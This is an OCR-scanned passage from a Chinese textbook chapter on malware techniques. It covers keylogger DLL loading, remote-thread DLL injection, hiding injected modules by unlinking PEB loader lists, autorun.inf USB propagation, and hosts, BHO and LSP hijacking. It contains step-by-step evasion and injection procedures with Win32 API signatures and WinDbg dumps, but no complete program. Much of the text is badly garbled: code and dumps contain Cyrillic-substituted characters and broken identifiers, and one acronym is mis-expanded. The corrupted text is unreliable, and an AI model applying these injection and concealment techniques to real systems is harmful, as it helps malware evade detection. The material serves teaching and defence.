ТЕЗЕ Сушмаш) 调用 DLL 文 件 的 时 候 ， 需 要 前 置 声明 加 载 该 dll 的 LIB 库 (静态 
包含 在 DLL 中 创建 的 函数 等 ) 文件 。 


#pragma comment ( 1ib，"DLIL 文 件 名 .Lib" ) :; 


# 


然后 就 可 以 正常 使 用 DLL 文件 中 的 导出 函数 了 。 
隐 式 链接 的 特点 为 : 使 用 方式 人 简单， 但 被 多 次 调用 时 ， 因 内 存 无 法 释放 使 内 存 开销 


大 ， 从 而 导致 系统 运行 缓慢 。 
显 式 链接 : 
НІМ5ТАКСЕ hInst = LoadLibrary ("DLIL 文 件 名 .d11"); / /映射 内 存 ,得 到 句柄 
typedef 类 型 (*xxx) (); // 定 义 函 数 指针 
ххх 变量 名 = (X X X)GetProcAddress (hInst, "DLL 导出 函数 名 ") ; 
р / /键盘 记 录 功 能 代码 
FreeLibrary (hInst) ; // 释 放 内 存 


显 式 链 接 比 隐 式 链接 复杂 ， 但 被 多 次 调用 时 的 内 存 开销 小 ， 这 也 是 键盘 记录 程序 作为 
首选 的 原因 。 下 面 接 痢 分 析 上 面 函数 : 


HMODULE МТМАРТ LoadLibrary ( 
„Та LPCTSTR lpFileName // 加 载 DLL 文件 进入 内 存 
); 


该 函数 仅 有 一 个 参数 lpFileName， 奇 DLL 文件 和 调用 DLL 的 cpp 原 文件 在 同一 目录 下 ， 
则 参数 可 以 直接 为 “Dll 名 称 .dll”; 奎 不 在 同一 个 目录 下 ， 则 需要 写 清楚 要 加 载 的 DLL 文 
件 的 路 径 。 


FARPROC GetProcAddress ( / / #035 Не Sr ВОРА HEH 
HMODULE hModule, // 加 载 进 内 存 的 DLL 句柄 
LPCWSTR lpProcName // 导 出 函数 名 


); 


因为 该 函数 导出 的 是 地 址 信息 ， 所 以 可 以 使 用 相关 指针 进行 接收 。 
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最 后 一 个 函数 如 下 。 
BOOL Freelibrary ( / /释放 加 载 的 DLL ( 类 似 c/C++ 语 言 中 malloc/new 与 
free/delete 的 对 应 关系 ) 
HMODULE hLibModule // 当 前 加 载 的 DLL 句柄 


9.3.2 DLL 注 入 


DLL 注入 又 称 远程 线程 注入 。 大 多 数 木 马 病毒 为 了 提高 自身 隐蔽 性 、 目 标 程序 的 针对 
性 、 进 程 检测 软件 的 胃 避 等 能 力 ， 均 采用 这 种 方式 。 其 中 远程 则 是 基于 线程 之 间 的 ， 即 通 
过 在 目标 程序 下 创建 线程 来 运行 病毒 功能 。 

先 来 了 解 DLL 注 入 需要 用 到 的 函数 ， 然 后 再 通过 其 使 用 步骤 来 认识 它 。 


HANDLE ИТМАРТ OpenProcess(  // 得 到 目标 进程 句柄 


DWORD dwDesiredAccess, / /权限 设 置 
BOOL bInheritHandle, / айя ж 
DWORD диРгосеззта // 目 标 PID ( 进程 ID ) 


); 


参数 一 dwDesiredAccess 权 限 通常 设置 为 PROCESS ALL ACCESS， 即 享有 全 部 权 
限 。 参 数 二 bInheritHamdle 则 设置 为 FALSE， 即 无 句柄 继承 。 人 参数 三 dwProcessId 则 为 目标 
进程 的 PID 。 调 用 该 函数 得 到 句柄 ， 这 是 假定 为 hPrcoess。 


LPVOID VirtualAllocEx ( // 为 目标 进程 申请 一 段 内 存 空间 
HANDLE hProcess, // 目 标 进程 句柄 
LPVOID lpAddress, // 申 请 内 存 的 起 始 地 址 
DWORD ам$1те, // 内 存 大 小 , 以 字 节 为 单位 
DWORD ПА11осағіопТуре, // 内 存 类 型 
DWORD flProtect // 内 存 权 限 


|; 


参数 一 wProcess 为 OpenProcess 得 到 的 进程 句柄 。 参 数 二 lpAddress 一 般 设置 为 NULL， 
也 就 是 由 系统 决定 申请 内 存 的 起 始 地 址 。 参 数 三 dwsize 分 配 的 大 小 应 为 页 内 存 的 整数 倍 。 参 
数 四 fAllocation Type 一 般 选 择 为 MEM COMMIT， 为 特定 的 页 面 区 域 分 配 内 存 中 或 磁盘 的 页 
面 文件 中 的 物理 存储 空间 。 参 数 五 HProtecf 为 PAGE READWRITE， 即 可 以 读 写 该 区 域 。 


BOOL ИгіееРргосеззМепогу( // 将 信息 写 入 内 存 
HANDLE ҺРгосеѕѕ, // 目 标 进 程 句柄 
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LPVOID lpBaseAddress, // 目 标 进 程 内 存 空间 的 首 地 址 
LPVOID lpBuffer, // 写 入 数据 的 缓冲 区 , 包含 写 入 内 存 的 首 地 址 
DWORD nSize, // 写 入 的 字 节 数 


LPDWORD lpNumberOfBytesWritten // 实 际 写 入 的 字 节 数 
); 


参数 二 ]pBaseAddress 即 为 VirtualAllocEx 函 数 申请 到 的 内 存 空间 。 为 了 下 一 步 使 用 远 
程 线 程 注入 DLL， 这 步 就 应 该 将 DLL 文 件 的 具体 路 笃 、 文 件 名 通过 上 述 函 数 写 入 目标 进程 
的 内 存 空间 ， 因 此 VirtualAllocEx 的 参数 三 dwSize 以 及 本 函数 的 参数 四 nSize 则 可 以 是 包含 
DLL 文件 的 具体 路 径 的 字符 串 长 度 。lpBuffer 则 设置 为 DLL 文件 的 具体 路 径 。 


HANDLE CreateRemoteThreadEx ( 


HANDLE hProcess, // 目 标 进 程 句柄 
LPSECURITY ATTRIBUTES lpThreadAttributes, // 定 义 新 线程 的 安全 描 术 符 
SIZE Т dwStackSize, // 挫 栈 初 始 大 小 
LPTHREAD START ROUTINE lpStartAddress, // 线 程 函 数 的 起 始 地 址 
LPVOID 1рРагамефег, // 指 针 传 参 

DWORD dwCreationFlags, // 线 程 运行 状态 
LPPROC THREAD ATTRIBUTE LIST lpAttributeList, // 新 线程 附加 参数 
LPDWORD lpThreadId // 返 回 线程 ID 


J. 


参数 二 lpThreadAttributes、 参 数 七 ljpAttributeList 以 及 参数 八 lpThreadId 通 常设 置 为 
NULL， 分 别 表 示 无 安全 摘 述 符 、 无 附加 参数 、 无 线程 DD 返回。 参数 三 dwStackSize 若 设置 
为 0， 则 将 以 默认 大 小 运行 程序 。 参 数 四 lpStartAddress 则 设置 为 导出 函数 在 目标 程序 内 存 
中 的 地 址 ，LoadLibrary 函 数位 于 Kermel32.dll 中 ， 几 乎 所 有 进程 局 动 均 会 加 载 kernel32.dl] 模 
块 ， 并 且 在 任何 进程 中 该 函数 地 址 相同 ， 可 以 使 用 GetModuleHandle 函 数 从 Kernel32.dll 中 
获得 DLL 人 句柄， 然后 放 入 GetProcAddress， 进 而 获得 类 型 为 FARPROC 的 LoadLibrary 函 数 加 
载 的 地 址 ， 随 后 转换 其 类 型 为 LPTHREAD START ROUTINE 即 可 。 而 用 于 传 参 的 指针 则 
是 由 VirtualAllocEx 尔 数 返 回 得 到 ， 即 用 于 传递 内 存 分 配 的 信息 。 参 数 dwCreationFlags 设 置 
为 0， 表 示 线 程 被 创建 后 立刻 运行 。 


HMODULE GetModuleHandle ( // 得 到 DLL 文件 模块 句柄 
LPCTSTR lpModuleName / /DLL 模 块 名 


) 


DWORD WaitForSingleobject(  ”// 用 于 等 待 线程 完成 


HANDLE hHandle, / /句柄 对 象 
DWORD dwMilliseconds // 等 待 线程 时 间 间 隔 
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); 


参数 一 hbHamdle 设 置 为 由 CreateRemoteThreadEx 返 回 的 线程 句柄 ， 而 参数 二 
dwMiUiseconcls 则 设置 为 INFINITE， 意 为 无 限 等 待 。 


BOOL VirtualFreeEx ( / /释放 使 用 VirtualAllocEx 分 配 的 内 存 
HANDLE БРгосез5, // 使 用 openProcess 返 回 的 目标 进程 句柄 
LPVOID ТрАй9гезз, // 指 向 VirtualAllocEx 分 配 的 内 存 地 址 


DWORD dwSize, / /释放 的 区 域 大 小 , 这 里 必须 设置 为 0, 与 下 一 个 参数 对 应 
DWORD амЕгеетуре  ”// 自 由 操作 类 型 ,设置 为 MEM RELEASE, , 指向 由 
VirtualAllocEx 分 配 的 区 域 
); 
DLL 注 入 具体 分 为 以 下 几 个 步骤 。 


(1) 通过 目标 程序 的 PID 〈 进 程 ID ) ， 使 用 OpenProcess 函 数 得 到 进程 句柄 。 

(2) 使 用 VirtualAllocEx 及 得 到 的 句柄 ， 在 目标 进程 下 创建 一 段 内 存 空 间 。 

(3) 使 用 WriteProcessMemory 将 DLL 文件 的 路 径 信息 写 入 内 存 。 

(4) 使 用 GetModuleHandle 以 及 GetProcAddress 得 到 LoadLibrary 函 数 的 地 址 〈 为 了 使 
用 LoadLibrary 加 载 恶 意 DLL 文件 ， 需 要 得 到 LoadLibrary 函 数 在 进程 中 的 地 址 ) 。 

(5) 使 用 CreateRemoteThreadEx 启 动 远程 线程 ， 加 载 恶 意 DLL 文件 。 

(6) 使 用 WaitForSingleObject 等 待 线程 运行 完毕 退出 。 

(7) 使 用 VirtualFreeEx 释 放 申 请 的 内 存 。 

(8) 使 用 CloseHandle 关 闭 句柄 。 

这 样 病 毒 代码 就 加 载 进 了 正常 程序 内 ， 并 且 进 程 监视 等 软件 无 法 检测 到 病毒 运行 的 存 
在 。 当 然 ， 更 加 巧妙 的 隐藏 目 身 的 方式 也 可 以 将 代码 直接 写 入 目标 进程 ， 那 么 下 列 步骤 中 
的 WriteProcessMemory 就 应 将 代码 写 入 内 存 。 随 后 利用 步骤 (4) 得 到 代码 内 使 用 的 API 函 
数位 于 系统 DLL 文件 在 该 进程 内 存 空 间 的 位 置 ， 那 么 此 步骤 应 在 目标 进程 空间 内 实现 。 为 
了 便于 得 到 写 入 代码 的 大 小 和 地 址 ， 则 往往 将 其 封装 入 结构 体 ， 再 使 用 sizeof〈 结 构 体 》 
以 及 取 地 址 符 &&〈( 结 构 体 就 可 得 到 。 

同时 也 可 以 通过 “隐藏 ”DLL 模块 ， 进 而 隐藏 DLL 文件 名 称 以 及 路 径 来 躲避 检测 工 
具 的 扫 摘 。 这 就 需要 知道 DLL 模块 在 内 存 中 具体 加 载 的 位 置 ， 然 后 才能 对 其 进行 修改 并 
隐藏 。 因 为 DLL 被 用 于 注入 目标 程序 的 内 存 空 间 ， 所 以 在 PEB 中 就 会 保存 该 DLL 模块 的 信 
息 ， 那 么 所 谓 “ 隐 藏 ”， 也 就 是 对 PEB 中 DLL 模块 的 信息 进行 修改 。 

首先 来 看 一 下 32 位 系统 下 的 TEB 结 构 。 在 WinDbg 中 打开 任意 可 执行 程序 ， 随 后 在 
0: 000 > 后 输入 !teb， 显 示 结 果 如 图 9-75 所 示 。 

从 图 9-75 中 可 以 得 出 TEB 及 PEB 的 地 址 (TEB: 7ffdf000h; РЕВ: 7ffdb000h) 。 随 后 
输入 dt teb 7ffdfo00 来 查看 TEB 结 构 信 息 ， 如 图 9-76 所 示 。 
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0:000> !teb 

TEB ағ ?ffdf000 
EzceptionList: 0022ғайс 
StackBase: 00230000 
StackLimit: 0022e000 
SubSy=temTib: 00000000 
Е1Бег аа: О000Те00 
ArbitrarvUserPointer: 00000000 
Self: ?ЕЕЧЕОПО 
Епулгоплеп Роз: ег“: 00000000 
С11еп Та: 0000050 . 00000548 
ЕрсНапй!1е: 00000000 
Тіс Storage: 00000000 
РЕВ Address: ?ғғаһайап 
LastErrorValue: 0 
LastStatusValue: 0 
Count Owned Locks: Ü 
HardErrorMode : 0 


9-75 TEB 显 示 结 果 
0:000> dt _teb 7ffdf000 


1149111 ТЕВ 
+0=000 HtTib г. 2 ЫН- 
+0х01с EnvironmentFointer : (null) 
+0=020 ClientId Ға FS БИ 0 си ра ди 


+0=028 ÀActiveRpcHandle : (null) 

+0=02с ThreadLocalStoragePointer : (null) 

+0=030 ProcessEnvironmentBlock : 0x7ffdb000 РЕВ 
+0=034 LastErrorValue 1223 

+0=038 Сочи ОЕОтпедСга + 1са15ес 1018 : 0 

+0х03с CsrClientThread : (пч11) 

+0=040 Win32Threadlnfto : (null) 


+0=044 Пзегз2Кезегтед г: 2618 
+0=0ас UserReserved = 151:0 
+0х0с0 WOU32Reserved < са 
+0х0с4 Currentlocale : 0x804 
+0х0с8 Ербо чате а изКечт а ег : 
+0=0сс бүзтелРезсегуейі : [54] Да 
+0х1а4 Екхсер 1опСоде r Оа0 
+Üzla8 ActivationConteztStack : АСТТУАТТОН СОНТЕХТ ЗТАСК 
+0х1Ъс брагеВу4е51 г: реми т" 
+0х194 са: ТеБВасЬ > GDI TEB BATCH 
+0ж6Ь4 Ева! Сеп! 19 : _СТТЕНТ_ Тр 

图 9-76 TEB 结 构 


这 里 可 以 看 出 PEB 结 构 位 于 TEB 偏 移 0x30 的 地 址 上。 而 TEB 结 构 的 信息 则 存放 于 FS 寄 
存 器 中 ， 那 么 便 可 以 通过 汇编 指令 mov eax, fs: [0x30] 来 得 到 PEB 的 地 址 。 
下 面 来 查看 PEB 结 构 ， 输 入 dt peb 7ffdb000 得 到 PEB 结 构 信 息 ， 如 图 9-77 所 示 。 
0:000> dt рер 0x7tfdb000 ee 


+0=000 InheritedàåddressS5Space : 0 '' 
+0=001 ReadImaqeFileEzecOptionsg : 0 '' 


+0х002 BeingDebugged 2 УЖЕ“ 

+0=003 брагеВоо1 чи «А 

+0=004 Mutant сх тете VOLA 

+0=008 ImageBaseàddress : 0=00400000 Void 

+0х00с Ldr : 0=00351еа0 РЕВ ІГЕ ГАТА 

+0=010 ProcessParameters : 0=00020000 ЕТІ, USER PROCESS PARAMETERS 
+0=014 SubSystenData : тай 

+0=018 Ргосе==Неар : 0=00250000 Void 

+0=01с FastPebLock 0х7с99а600 ЕТІ, CRITICAL SECTION 


+0=020 ғаз ODL cli : 0ж?с921000 Void 
+0=024 FastPebUnlockRoutine : 0x7c9210e0 Void 


9-77 РЕВ 
其 中 有 个 重要 的 参数 ， 相 对 PEB 偏 移 地 址 为 0x0c 的 Ldr 结 构 ， 即 struct РЕВ LDR 
DATA *Ldr， 其 中 Ldr 为 指向 PEB ТОВ DATA 结构 的 指针 。 
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MSDN 中 PEB 结 构 如 下 。 


typedef struct РЕВ 
{ 
UCHAR InheritedAddressSpace; 
UCHAR ReadImageFileExecOptions; 
UCHAR BeingDebugged; 
UCHAR 5рагеВоо1; 
PVOID Mutant; 
PVOID ImageBaseAddress; 
PPEB LDR DATA Ldr; 
} PEB, *РРЕВ; 


现在 再 使 用 WinDbg 查 看 结构 。 输 入 dt РЕВ LDR DATA 0x00351ea0 查 看 РЕВ LDR 
DATA 结 构 〈( 见 图 9-78) 。 


0:000> dt РЕВ ІШЕ БАТА 0х00351еай 
1149111 РЕВ ТОЕ ГАТА 


+0х000 Length : Ож2в 
+0х004 Initialized : 0=1 '' 
+0=008 SsHandle : (null) 


+0=00с InLoadOrderModuleList : 115Т ЕНТЕУ | 0=351ее0 - 0ж352090 | 

+0=014 InMemorvOrderModuleList : 115Т ENTRY | 0=351ее8 - 0=3520а8 | 

+0х01с InlInitializationOrderModuleLis=st : 115Т ЕНТЕУ | 0=351Е58 - 0=3520е0 | 
+0=024 EntryInProgress : (null) 


89-78 РЕВ ОВ ОАТА t4 
查阅 MSDN。 


суреаеЕ зсгисс РЕВ DDR БАТА | 


ULONG Length; //+0хо0 
BOOLEAN Тп1Е1а11теа; //+0х04 
PVOID $5Напа1е; //+0х08 


LIST ENTRY InLoadOrderModuleList; 
//+Охос а ЕЯ 0 МЕ ПИЯ ТР ==, 
LIST ENTRY InMemoryOrderModuleList; //+0x14 
LIST ENTRY InInitializationOrderModuleList; //+0х1с 
| РЕВ LDR DATA, *РРЕВ LDR DATA; 


这 里 的 重点 是 参数 三 InMemoryOrderModuleList 及 参数 四 InLoadOrderModuleList， 首 
先 来 看 看 它 的 类 型 LIST ENTRY。 


typedef struct LIST ENTRY | 
struct LIST ENTRY *Flink;  // 指 向 下 一 个 链表 节点 的 BLink 指 针 
struct LIST ENTRY *Blink;  // 指 向 上 一 个 链表 节点 的 FLink 指 针 
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| LIST ЕМТКҮ, *РЬТЗТ ЕМТВУ, "RESTRICTED POINTER РКЪТ5Т ENTRY; 


该 结构 体 包含 两 个 指针 ， 作 为 链接 模块 节点 的 工具 ， 由 此 可 以 看 出 PEB 中 保存 模板 信 
县 是 以 链表 的 形式 构成 的 ， 并 且 参 数 中 的 每 一 项 指 站 名 为 ТОК DATA TABLE ENTRY 的 
结构 体 : 


typedef struct LDR DATA TABLE ENTRY ( 
PVOID Кезегуей1 [2]; 
LIST ENTRY InMemoryOrderLinks; 
PVOID Кезегуед2 [2]; 
PVOID DllBase; //DLL 模 块 地 址 
PVOID EntryPoint; 
PVOID Reserved3; 
UNICODE STRING FullDllName; / /DLL 路 径 名 
BYTE Reserved4[8]; 
PVOID Ве5егуеа5 [3]; 
union í 
ULONG CheckSum; 
PVOID Веѕегуеаб; 
}; 
ULONG TimeDatesStamp; 
} LDR БАТА TABLE ENTRY, *РЬОВ DATA TABLE ENTRY; 


很 明显 ， 该 结构 体 存 放 了 程序 以 及 加 载 的 DLL 模块 的 地 址 DI]Base 和 它们 的 路 径 信 
息 ， 也 就 是 UNICODE STRING 类 型 的 参数 FullDIIName。 


Суредег всгисе UNICODE 5ТВТМС | 


USHORT Length; // 长 度 
USHORT Maximumlength; // 最 大 长 度 
PWSTR Buffer; // 缓 冲 区 


} UNICODE STRING; 


隐藏 DLL 的 方式 就 是 : 

(1) 将 保存 注入 的 DLL 文件 模块 的 信息 链 进行 脱 链 操作 。 

(2) (可 选 ) 将 信息 链 中 保存 的 DLL 路 径 及 文件 名 清除 。 

具体 实现 方法 : 

(1) 定位 到 程序 Ldr 的 地 址 ， 以 Ldr 一 InLoadOrderModuleList.Flink 作 为 遍历 模块 的 入 
Но 
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而 在 64 位 系统 中 ， 使 用 WinDbg 查 看 同一 程序 的 情况 则 不 同 于 32 位 系统 ， 如 图 9-79、 
图 9-80 所 示 。 
Wowbd TEB ағ O000000007efdb000 
EzceptionList: ООО000000?7е# 9494000 
СтасКкВазе: 000000000008ЕЯ20 
StackLimit: 0000000000085000 
SubSystenTib: 0000000000000000 
Е1Ьег Оаа: ООО0000000000Те00 
àrbitraryUserFointer: 0000000000000000 
Self: 000000007ef db000 
EnvironmentPointer: 0000000000000000 
ClientId: 0000000000001854 0000000000001990 
ЕрсНапй!1 е: 0000000000000000 
Тіс Storage: 0000000000000000 
РЕВ Address: 00000000 7е#ағ 000 
Таз Еггог”а!че: 0 
LastStatusValue: 0 
Count Owned Locks: Ü 
HardErrorMode : 0 
Ё 9-79 64 位 TEB 结 构 

0:000> dt teb Пх?еҒаҺйй00 

0:000> dt _teb Пх?еҒаҺ00П 

піа11! TEB 
+0=000 NtTib НТ ТІВ 
+0=038 EnvironmentPointer (null) 
+0=040 ClientId : _СТТЕНТ ІП 
+0=050 ActiveFRpcHandle (null) 
+0=058 ThreadLocalStoragePointer : (null) 


+0х060 ProcessEnvironmentBlock : 
+0х068 Іа=їЕггогЧа1це : Ü 
+0х06с Соча ОЕОктпе4Сга 1са15ес 1015 


+0=070 CsrClientThread (null) 
+0=078 Win32Threadlnto (null) 
+0=080 User32Reserved [25] Ü 


+0=0е8 UserReserved : 1510 
+0=100 WOW32Reserved (null) 


9-80 ”32 位 TEB 结 构 


Ux00000000 ?efdt000 РЕВ 


PEB 地 址 偏 移 并 不 是 之 前 的 0x30 了 ， 而 是 0x60， 继 续 查 看 EB 结构 ， 如 图 9-81 所 示 。 


ntdll!_PEB 
+0=000 InheritedàddressSpace : Ü '' 
+0=001 ReadImaqeFileEzecOptionsg : 0 '' 
+0х002 BeingDebugged : 0=1 '' 
+0=003 BitField Ü '' 
+0=003 орнады ЕЕ В : 0у0 
+0=003 IsProtectedProcess : Пу 
+0=003 І=ІечасуРгосе== : 0уй 
+0=003 IsImageDynamicallyRelocated : 0у( 
+0=003 пы Oa e sepapu : Dw0 
+0=003 брагеВ: 15 
+0=008 Mutant 
+0=010 ImageBaseàddress : 
+0=018 Ldr : 000000000 ` 774292640 
+0=020 ProcessParameters : 0x00000000`00732340 ` 


图 9-81 64 位 PEB 结 构 


Ldr 的 偏 移 地 址 同样 也 发 生 了 改变 ， 偏 移 地 址 改 为 0x18。 


y 
: Üzgffffffff`ffffffff Void 
0=00000000` 00400000 Void 
- РЕВ ІРГЕ ГАТА 
_ЕТІ ПЗЕЕ РРОСЕ55 РАБАМЕТЕЕЗ 


那么 对 应 的 FS 寄存 器 中 的 值 也 需要 进行 改变 。 接 下 来 ， 介 绍 另 一 种 方式 即使 用 API 函 


数 进行 获取 PEB 地 址 的 操作 。 


МІМАРІ NtQueryInformationProcess( 


HANDLE ProcessHandle., 


РВОСЕ55ІМЕОСІ.А55 ProcessInformationClass, 


— РЕГ — 


// 检 索 指 定 进程 的 信息 
// 进 程 句柄 
/ /检索 信 息 类 型 
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PVOID ProcessInformation, // 写 入 信息 的 缓冲 区 
ULONG ProcessInformationLength, // 缓 冲 区 大 小 
PULONG ReturnLendth // 返 回信 息 大 小 


参数 一 指定 为 目标 进程 句柄 ， 参 数 二 ProcessInformationClass 可 取 下 列 值 。 


typedef enum PROCESSINFOCLASS ( 


ProcessBasicInformation, / /PEB 结 构 信息 
ProcessDebugPort, // 调 试 端口 


ProcessQuotaLimits, 

ProcessIoCounters, 

ProcessVmCounters, 

ProcessTimes, 

ProcessBasePriority, 

ProcessRaisePriority, 

ProcessDebugPort, // 检 索 DWORD PTR 类 型 ,调试 程序 的 端口 号 
РгосеѕѕЕхсерііопрРог+, 

Ргосе55Ассе55Токеп, 

ProcessLdtInformation, 

Ргосезз19Е 81 ге, 

РгосеззПеГац! СНагдЕггогМоде, 

РгосеззТоРогТтНапяЯтегз, 

РгосеззРоо1 ед0задеАпа пи 15, 
ProcessWorkingSetWatch, 

ProcessUserModeIOPL, 
ProcessEnableAlignmentFaultFixup, 
ProcessPriorityClass, 

ProcessWx86Information, 

ProcessHandleCount, 

ProcessAffinityMask, 

ProcessPriorityBoost, 

ProcessDeviceMap, 

ProcessSessionInformation, 
ProcessForegroundInformation, 
ProcessWow64Information，// 程 序 运 行 的 环境 是 否 为 64 位 系统 
ProcessImageFileName，// 检 索 UNICODE STRING 类 型 ,包含 图 像 文件 的 名 称 
ProcessLUIDDeviceMapsEnabled, 
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ProcessBreakonTermination，// 检 索 ULONG 类 型 , 指示 程序 关键 处 
ProcessDebugObjectHandle, 
ProcessDebugFlags, 
ProcessHandleTracing, 
ProcessIoPriority, 
РгосеѕѕЕхесиіеЕ1адѕ, 
ProcessTlsInformation, 
ProcessCookie, 
ProcessImageInformation, 
ProcessCycleTime, 
ProcessPagePriority, 
ProcessInstrumentationCallback, 
ProcessThreadStackAllocation, 
ProcessWorkingSetWatchEx, 
ProcessImageFileNameWin32, 
ProcessImageFileMapping, 
ProcessAffinityUpdateMode, 
ProcessMemoryAllocationMode, 
ProcessGroupInformation, 
ProcessTokenVirtualizationEnabled, 
ProcessConsoleHostProcess, 
ProcessWindowInformation, 
MaxProcessInfoClass 


} PROCESSINFOCLASS; 


这 里 ， 显 然 取 ProcessBasicInformation， 其 中 保存 了 PEB 结 构 信 息 。 


СуреаеЕ struict PROCESS BASIC INFORMATION | 
PVOID Reservedl; 
PPEB PebBaseAddress; 
PVOID Reserved2[2]; 
ULONG РТК UniqueProcessId; 
PVOID Reserved3; 
} PROCESS BASIC INFORMATION; 


该 结构 体 的 参数 二 即 为 PEB 结 构 的 基地 址 ， 也 正 是 我 们 需要 得 到 的 信息 。 
函数 中 参数 三 ProcessInformation 用 来 接收 PEB 信 息 的 缓冲 区 〈 以 PROCESS BASIC ` 
INFORMATION 类 型 声明 缓冲 区 接收 信息 ) ， 参 数 四 ProcessInformationLength 表 示 信 息 的 
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大 小 〈sizeof 即 可 ) 。 该 函数 并 未 被 微软 公开 ， 因 此 需要 使 用 GetProcAddress 和 LoadLibrary 
从 Ntdlldll 中 获取 该 函数 地 址 。 调 用 该 函数 以 后 ， 便 得 到 了 PEB 结 构 的 地 址 。 


033 autorun.inf 一 一 风靡 一 时 


U 熏 病毒 在 2007 年 大 规模 爆发 ， 并 且 和 危害 很 大 。2011 年 ， 随 看 微软 发 布 名 为 KB967940 
的 补丁 后 ，U 盘 病毒 在 XP 系 统 下 主动 传播 功能 近乎 失效 ， 如 今 在 Windows 7/8 甚 至 10 普 及 的 今 
天 ，U 盘 病毒 更 是 失去 了 效果 ， 但 其 原理 却 是 值得 一 探究 竟 的 。 

病毒 主要 利用 了 autorun.inf 的 特性 一 一 随 U 盘 打开 而 自动 运行 的 功能 。 以 记事 本 的 形式 
打开 该 文件 ， 则 文件 如 图 9-82 所 示 。 

autorun.inf 文 件 ( 见 图 9-83) 格式 一 般 如 下 : 

[AutoRun] 

open= 打 开 的 程序 

该 程序 往往 是 隐藏 在 U 盘 中 的 病毒 文件 。 下 面 的 shell 等 同样 也 起 到 打开 文件 的 作用 。 


格式 (O) 


ellexecute=coink. ехе 
C D ань 
= К) || Ша (一 


图 9-82 autorun.inf(1) | 9-83 aaa | 

就 本 例 来 说 ， 内 置 该 文件 的 U 盘 被 双击 打开 以 后 ， 会 目 动 运行 coink.exe 病 毒 。 该 病毒 
则 会 将 目 身 复制 进 系 统 目 录 ， 然 后 添加 到 目 局 项 ， 实 现 木马 病毒 等 功能 。 该 病毒 通过 监控 
USB 接 口 信息 ， 一 旦 检测 到 有 U 盘 插入 ， 则 复制 目 身 进入 U 盘 并 创建 改写 U 盘 的 autorun.inf 
文件 ， 然 后 通过 隐藏 目 身 来 实现 感染 U 盘 的 目的 ， 进 而 继续 进行 传播 。 接 下 来 具体 认识 它 
的 这 些 功能 是 如 何 实现 的 。 

病毒 一 般 会 创建 三 个 文件 ， 在 系统 根 目 录 下 和 U 盘 中 创建 目 身 ， 即 可 执行 病毒 (ехе. 
com 等 文件 ) ; 在 U 盘 里 创建 或 替换 autorun.inf 文 件 。 

病毒 检测 U 盘 的 手段 并 不 神秘 ， 不 过 是 使 用 了 GetDriveIype 函 数 而 已 。 


UINT ИТМАРТ GetDriveType ( 
LPCTSTR lpRootPathName // ЖАЖА 
); 


参数 显然 为 盘 符 的 名 称 了 ， 例 如 C: „ МК РИН 0 ЮКІУЕ КЕМОУАВІЕ, 
则 表示 是 移动 存储 设备 ， 如 U 盘 等 ， 若 为 DRIVE FIXED， 则 为 固定 硬盘 ; 若 为 DRIVE 
CDROM， 则 为 光驱 。 然 后 将 这 个 函数 放 入 循环 ， 每 隔 一 段 时 间 检 测 全 部 磁盘 就 实现 了 检 
测 U 熏 的 功能 。 

紧 接 看 就 是 隐藏 目 身 文件 的 功能 ， 代 码 如 下 所 示 。 
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BOOL SetFileAttributes ( 
LPCTSTR lpFileName, / /文件 详细 路 径 
DWORD dwAttributes // 文 件 属性 
); 


文件 路 径 也 就 是 autorun.inf 以 及 病毒 程序 的 具体 路 径 ， 文 件 属性 则 设置 为 FILE_ 
ATTRIBUTE _ HIDDEN， 那 么 文件 就 被 隐藏 了 。 
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本 小 节 讲 述 的 是 病毒 的 各 种 劫持 方式 。 
1. яя 


(1) Боз КР 

hosts СЛ. 9-84) 文件 路 径 一 般 为 C: \Windows\System32\driversvetc， 可 以 用 记事 本 
打开 ， 其 作用 是 加 快 域名 访问 速度 ， 也 就 是 当 用 户 输入 某 网 址 并 访问 时 ， 铬 hosts 中 存 有 该 
网 址 与 对 应 IP 则 会 通过 该 IP 解 析 并 访问 该 网 站 。 因 此 ， 病 毒 也 会 通过 修改 对 应 网 站 的 IP， 
将 用 户 输入 的 网 址 支持 至 指定 人 的 网 站 ， 这 是 hosts 支 持 。 


#46. 61. 155. 222 google. com 

#46. 61. 155. 222 www. google. com 

#46. 61. 155. 222 m. google. com 

#46. 61. 155.222 scholar. google. com 
#46. 61. 155. 222 translate. google. соп 
#46. 61. 155. 222 books. google. com 
#46. 61. 155.222 арреп=іпе. google. соп 
#46. 61. 155.222 maps. google. com 

#46. 61. 155.222 news. google. com 

#46. 61. 155. 222 images. google. com 
#46. 61. 155.222 finance. google. com 
#46. 61. 155, 222 history. google. com 
#46. 61. 155. 222 drive. google. com 
#46. 61. 155.222 docs. google. com 

#46. 61. 155. 222 plus. google. com 

#46. 61. 155.222 play. google. com 

#46. 61. 155. 222 calendar. google. com 


9-84 ”hosts 文件 
(2) BHO 动 持 
BHO (Browser Helper Object， 浏 览 器 辅助 对 象 〉 是 浏览 器 与 程序 员 之 间 开 放 人 交互 接 
口 的 业界 标准 。 程 序 员 通 过 这 个 接口 可 以 编写 代码 控制 浏览 器 的 行为 别有用心 的 病毒 编 
与 者 则 会 用 此 劫持 浏览 器 ， 如 复 改 正 主页 、 弹 广告 等 。 
BHO 在 注册 表 中 的 位 置 是 HREY LOCAL MACHINE SOFTWAREN MicrosoftNWindows,N 
CurrentVersion\Explorer\Browser Helper Objects\， 如 图 9-8$ 所 示 。 其 下 的 项 名 即 为 对 应 的 
ВНО. 
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Ё Explorer 

р ‚№ Advanced 

> й АррКеу 

H Associations 

р “和 АшоСотрее 

b ~ AutoplayHandlers 

| Е 1. ВгомѕеМемРгосеѕѕ 

«| 1. Browser Helper Objects 

| = 1. (B69F34DD-F0F9-42DC-9EDD-957187DA688D) 


9-85 ” ”BHO 注册 表 

在 HKEY LOCAL MACHINE\SOFTWARE\Classes\CLSID\ 下 ， 可 以 找到 BHO 对 应 的 
注册 项 。 其 中 CLSID 属 于 GUID (Globally Unique Identifier) ， 也 称 作 UUID (Universally 
Unique Identifier) ， 它 是 全 局 唯一 标识 从 ， 作 为 COM 类 的 标识 和 从。 

其 中 InprocServer32 下 键 值 数据 所 表示 的 是 BHO 加 载 的 DLL 文件 〈 见 图 9-86) 。 病 毒 则 
会 将 自身 添加 进 BHO 且 加 载 恶 意 DLL 来 劫持 浏览 器 。 

(3) LSP 动 持 

LSP (Label Switched Path， 分 层 服务 提供 程序 ) 全 称 是 Winsock LSP， 它 是 TCP/IP、 
UDP/IP 等 协议 的 接口 。LSP 动 持 则 是 指 支持 其 发 送 消息 的 机 制 ， 比 如 在 TCP 协 议 下 ， 病 毒 
